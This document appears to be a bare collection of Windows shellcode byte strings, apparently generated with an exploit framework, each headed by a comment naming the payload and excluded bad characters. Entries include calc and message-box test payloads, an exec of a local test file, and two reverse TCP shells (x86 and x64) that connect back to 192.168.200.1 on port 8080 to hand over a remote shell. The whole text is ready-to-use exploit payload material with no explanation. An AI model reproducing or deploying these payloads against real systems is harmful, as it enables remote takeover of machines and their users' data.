# Calc \x00\x0a\x0d
"\xba\x27\xe4\xad\x97\xd9\xea\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x28\x06\x58\x6b\xde\x44"
"\xa3\x94\x1e\x29\x2d\x71\x2f\x69\x49\xf1\x1f\x59\x19\x57\x93"
"\x12\x4f\x4c\x20\x56\x58\x63\x81\xdd\xbe\x4a\x12\x4d\x82\xcd"
"\x90\x8c\xd7\x2d\xa9\x5e\x2a\x2f\xee\x83\xc7\x7d\xa7\xc8\x7a"
"\x92\xcc\x85\x46\x19\x9e\x08\xcf\xfe\x56\x2a\xfe\x50\xed\x75"
"\x20\x52\x22\x0e\x69\x4c\x27\x2b\x23\xe7\x93\xc7\xb2\x21\xea"
"\x28\x18\x0c\xc3\xda\x60\x48\xe3\x04\x17\xa0\x10\xb8\x20\x77"
"\x6b\x66\xa4\x6c\xcb\xed\x1e\x49\xea\x22\xf8\x1a\xe0\x8f\x8e"
"\x45\xe4\x0e\x42\xfe\x10\x9a\x65\xd1\x91\xd8\x41\xf5\xfa\xbb"
"\xe8\xac\xa6\x6a\x14\xae\x09\xd2\xb0\xa4\xa7\x07\xc9\xe6\xad"
"\xd6\x5f\x9d\x83\xd9\x5f\x9e\xb3\xb1\x6e\x15\x5c\xc5\x6e\xfc"
"\x19\x39\x25\x5d\x0b\xd2\xe0\x37\x0e\xbf\x12\xe2\x4c\xc6\x90"
"\x07\x2c\x3d\x88\x6d\x29\x79\x0e\x9d\x43\x12\xfb\xa1\xf0\x13"
"\x2e\xc2\x97\x87\xb2\x2b\x32\x20\x50\x34"

# windows/exec c:\tests\messagebox.exe \x00\x0a\x0d
"\xda\xcf\xbf\x27\xae\x7b\x4c\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x35\x31\x78\x17\x83\xc0\x04\x03\x5f\xbd\x99\xb9\x63\x29\xdf"
"\x42\x9b\xaa\x80\xcb\x7e\x9b\x80\xa8\x0b\x8c\x30\xba\x59\x21"
"\xba\xee\x49\xb2\xce\x26\x7e\x73\x64\x11\xb1\x84\xd5\x61\xd0"
"\x06\x24\xb6\x32\x36\xe7\xcb\x33\x7f\x1a\x21\x61\x28\x50\x94"
"\x95\x5d\x2c\x25\x1e\x2d\xa0\x2d\xc3\xe6\xc3\x1c\x52\x7c\x9a"
"\xbe\x55\x51\x96\xf6\x4d\xb6\x93\x41\xe6\x0c\x6f\x50\x2e\x5d"
"\x90\xff\x0f\x51\x63\x01\x48\x56\x9c\x74\xa0\xa4\x21\x8f\x77"
"\xd6\xfd\x1a\x63\x70\x75\xbc\x4f\x80\x5a\x5b\x04\x8e\x17\x2f"
"\x42\x93\xa6\xfc\xf9\xaf\x23\x03\x2d\x26\x77\x20\xe9\x62\x23"
"\x49\xa8\xce\x82\x76\xaa\xb0\x7b\xd3\xa1\x5d\x6f\x6e\xe8\x0b"
"\x6e\xfc\x97\x7e\x70\xfe\x97\x2e\x19\xcf\x1c\xa1\x5e\xd0\xf7"
"\x85\x91\x9a\x55\xaf\x39\x43\x0c\xed\x27\x74\xfb\x32\x5e\xf7"
"\x09\xcb\xa5\xe7\x78\xce\xe2\xaf\x91\xa2\x7b\x5a\x95\x11\x7b"
"\x4f\xf6\xaf\xdf\x04\x9d\xbc\xab\x97\x01\x2e\x31\x2b\xca\xd1"
"\xde\xae\x4e\x7d\x59\x1f\xeb\xf9\xfc\x5f"

# windows/messagebox \x00\x0a\x0d
"\xd9\xc5\xd9\x74\x24\xf4\xbf\x88\xfe\xb2\x17\x58\x31\xc9\xb1"
"\x43\x31\x78\x1a\x03\x78\x1a\x83\xc0\x04\xe2\x7d\x27\x59\x8c"
"\xa4\xac\xba\x47\x67\x9f\x71\xd0\xb6\xd6\x12\x94\xc9\xd8\x51"
"\xdc\x25\x92\x10\x3d\xbe\xe2\xd4\xb6\xbe\xca\x6f\xfe\x06\x44"
"\x68\x8a\x85\x03\x89\xa5\x96\x55\xe9\xce\x04\xb2\xce\x5b\x91"
"\x86\x85\x08\x31\x8f\x98\x5a\xca\x25\x83\x11\x96\x99\xb2\xce"
"\xc5\xee\xfd\x9b\x3d\x84\xff\x75\x0c\x65\xce\x49\x92\x35\xb5"
"\x8a\x1e\x41\x77\xc5\xd3\x4c\xb0\x31\x1f\x75\x42\xe2\xf7\xff"
"\x5b\x61\x5d\x24\x9d\x9d\x07\xaf\x91\x2a\x4c\xf5\xb5\xad\xb9"
"\x81\xc2\x26\x3c\x7e\x43\x7c\x1a\x62\x35\xbe\xd0\x92\x9c\x94"
"\x9d\x46\x57\xd6\xf5\x06\x26\xd9\xe9\x45\x5f\x7a\x0e\x96\x60"
"\x0c\xb5\x6d\x24\x71\xed\x8c\x29\x09\x11\x75\x9c\xfd\xa7\x8a"
"\xdf\x01\x3e\x31\x28\x96\x2c\xd6\x08\x27\xc4\x15\x7b\x89\x70"
"\x32\x0e\xa6\x1d\xb0\xc0\x93\x55\x68\x05\x2e\xec\x77\x13\xd1"
"\xbb\x73\x15\xef\x13\xc7\x8d\x52\xde\x8b\x49\x8e\xc4\xa1\xbd"
"\xf0\xfb\xb9\xc1\x67\x4a\x08\x79\x20\x24\xc3\xc4\x82\xfa\xda"
"\x1d\xaa\x5e\x39\xa5\x22\xbd\x29\x88\x6c\x61\x8a\xa2\xef\x15"
"\xaf\x56\x98\xbc\x41\xf1\x3d\x56\xff\x8f\xd8\x86\x97\x36\x4c"
"\xb3\x47\xf8\x5b\xb3\xc4\xde\x4a\x4a\x35\x2f\xbf\x1e\xe5\x01"
"\x6d\x61\xd9\x93\x51\xcd\x25\x86\x59"

# windows/x64/shell_reverse_tcp lhost=192.168.200.1 lport=8080 -b '\x00\x0a\x0d'
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x36\xfc\xe2\x90\x39\x5c\xd6\xac\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xca\xb4\x61\x74\xc9\xb4"
"\x16\xac\x36\xfc\xa3\xc1\x78\x0c\x84\xfd\x60\xb4\xd3\x42\x5c"
"\x14\x5d\xfe\x56\xb4\x69\xc2\x21\x14\x5d\xfe\x16\xb4\x69\xe2"
"\x69\x14\xd9\x1b\x7c\xb6\xaf\xa1\xf0\x14\xe7\x6c\x9a\xc0\x83"
"\xec\x3b\x70\xf6\xed\xf7\x35\xef\xd1\x38\x9d\x34\x41\x64\xbd"
"\xb3\xd8\xb2\x0e\xf6\x27\x74\xc0\xaa\x91\xe9\xd7\x56\x24\x36"
"\xfc\xe2\xd8\xbc\x9c\xa2\xcb\x7e\xfd\x32\xc0\xb2\x14\xce\xe8"
"\xbd\xbc\xc2\xd9\x38\x8c\x35\xfa\x7e\x03\x2b\xd1\xb2\x68\x5e"
"\xe4\x37\x2a\xaf\xa1\xf0\x14\xe7\x6c\x9a\xbd\x23\x59\x34\x1d"
"\xd7\x6d\x0e\x1c\x97\x61\x75\x5f\x9a\x88\x3e\xb9\xdb\x41\x4c"
"\x84\x8e\xe8\xbd\xbc\xc6\xd9\x38\x8c\xb0\xed\xbd\xf0\xaa\xd4"
"\xb2\x1c\xca\xe5\x37\x2c\xa3\x1b\x3d\xd4\x9e\xad\xe6\xbd\xba"
"\xd1\x61\x02\x8f\xf6\x77\xa4\xa3\xc9\x78\x06\x9e\x2f\xda\xdc"
"\xa3\xc2\xc6\xbc\x8e\xed\x6f\xa6\xaa\x1b\x2b\xb5\x81\x53\xc9"
"\x03\xbf\xd9\x87\x2b\xa5\x9e\x69\xcf\xd0\x90\x39\x1d\x80\xe5"
"\xbf\x1a\xaa\x11\xd5\xfc\xd7\xac\x36\xb5\x6b\x75\x70\xe0\xd4"
"\xac\x29\x6c\x22\x38\xf1\x5d\x97\xf8\x7f\x75\x06\xdc\xb0\xad"
"\x97\x16\x7a\x8b\xc4\x97\xc6\x89\x9a\x25\xdc\x94\xe3\x91\x39"
"\x5c\x8f\xed\x8c\xd5\x62\xfb\x39\xa3\x03\xfc\x66\xb1\xd3\x59"
"\x74\x6d\x16\xe4\xc9\x3c\xaa\x19\xfb\x14\x29\x6c\x7e\x75\x23"
"\xd1\x83\xb6\xd9\x73\xd6\x03\x37\xd8\xb0\x9b\xbc\xbc\x77\xa4"
"\xae\x19\xdb\x14\x5f\x55\x77\x46\x7b\x35\x4d\x3d\x29\x79\x7e"
"\x7d\x26\xd0\x3b\x5c\xd6\xe5\x8e\x9f\x8f\xf4\x39\x5c\xd6\xac"
"\x36\xbd\xb2\xd1\x69\x14\x5f\x4e\x61\xab\xb5\xdd\x08\x9c\xbc"
"\xa1\x6f\xbd\xb2\x72\xc5\x3a\x11\xe8\x12\xa8\xe3\x91\x71\xd1"
"\x92\x88\x2e\x3a\xe2\xf8\x71\xd5\x30\xfa\x66\xbd\xb2\xd1\x69"
"\x1d\x86\xe5\xc9\x3c\xa3\xc0\x70\xa3\x1e\xe1\xbf\x3d\xae\x19"
"\xf8\x1d\x6c\xd5\xfa\xc3\x64\x6f\xec\x14\xe7\x7e\x7e\x03\x28"
"\x1b\x37\x1d\x6c\xa4\xb1\xe1\x82\x6f\xec\xe7\x26\x19\x94\xaa"
"\xa3\x2a\x9f\xc9\x6b\x31\xc9\x29\xaa\x13\xfd\x74\xea\xaa\x4a"
"\xf6\x62\x6b\xd9\x29\xd3\x17\x71\xef\x90\xff\x53\x5c\x8f\xed"
"\xbf\x26\x1d\x45\x39\x5c\xd6\xac"

#windows/shell_reverse_tcp lhost=192.168.200.1 lport=8080 -b '\x00\x0a\x0d' 
"\xdb\xcb\xd9\x74\x24\xf4\xba\x7c\x2b\x90\xb4\x5e\x29\xc9\xb1"
"\x52\x31\x56\x17\x83\xee\xfc\x03\x2a\x38\x72\x41\x2e\xd6\xf0"
"\xaa\xce\x27\x95\x23\x2b\x16\x95\x50\x38\x09\x25\x12\x6c\xa6"
"\xce\x76\x84\x3d\xa2\x5e\xab\xf6\x09\xb9\x82\x07\x21\xf9\x85"
"\x8b\x38\x2e\x65\xb5\xf2\x23\x64\xf2\xef\xce\x34\xab\x64\x7c"
"\xa8\xd8\x31\xbd\x43\x92\xd4\xc5\xb0\x63\xd6\xe4\x67\xff\x81"
"\x26\x86\x2c\xba\x6e\x90\x31\x87\x39\x2b\x81\x73\xb8\xfd\xdb"
"\x7c\x17\xc0\xd3\x8e\x69\x05\xd3\x70\x1c\x7f\x27\x0c\x27\x44"
"\x55\xca\xa2\x5e\xfd\x99\x15\xba\xff\x4e\xc3\x49\xf3\x3b\x87"
"\x15\x10\xbd\x44\x2e\x2c\x36\x6b\xe0\xa4\x0c\x48\x24\xec\xd7"
"\xf1\x7d\x48\xb9\x0e\x9d\x33\x66\xab\xd6\xde\x73\xc6\xb5\xb6"
"\xb0\xeb\x45\x47\xdf\x7c\x36\x75\x40\xd7\xd0\x35\x09\xf1\x27"
"\x39\x20\x45\xb7\xc4\xcb\xb6\x9e\x02\x9f\xe6\x88\xa3\xa0\x6c"
"\x48\x4b\x75\x22\x18\xe3\x26\x83\xc8\x43\x97\x6b\x02\x4c\xc8"
"\x8c\x2d\x86\x61\x26\xd4\x41\x4e\x1f\x1e\x90\x26\x62\x9e\x8c"
"\x26\xeb\x78\xd8\x56\xba\xd3\x75\xce\xe7\xaf\xe4\x0f\x32\xca"
"\x27\x9b\xb1\x2b\xe9\x6c\xbf\x3f\x9e\x9c\x8a\x1d\x09\xa2\x20"
"\x09\xd5\x31\xaf\xc9\x90\x29\x78\x9e\xf5\x9c\x71\x4a\xe8\x87"
"\x2b\x68\xf1\x5e\x13\x28\x2e\xa3\x9a\xb1\xa3\x9f\xb8\xa1\x7d"
"\x1f\x85\x95\xd1\x76\x53\x43\x94\x20\x15\x3d\x4e\x9e\xff\xa9"
"\x17\xec\x3f\xaf\x17\x39\xb6\x4f\xa9\x94\x8f\x70\x06\x71\x18"
"\x09\x7a\xe1\xe7\xc0\x3e\x11\xa2\x48\x16\xba\x6b\x19\x2a\xa7"
"\x8b\xf4\x69\xde\x0f\xfc\x11\x25\x0f\x75\x17\x61\x97\x66\x65"
"\xfa\x72\x88\xda\xfb\x56"
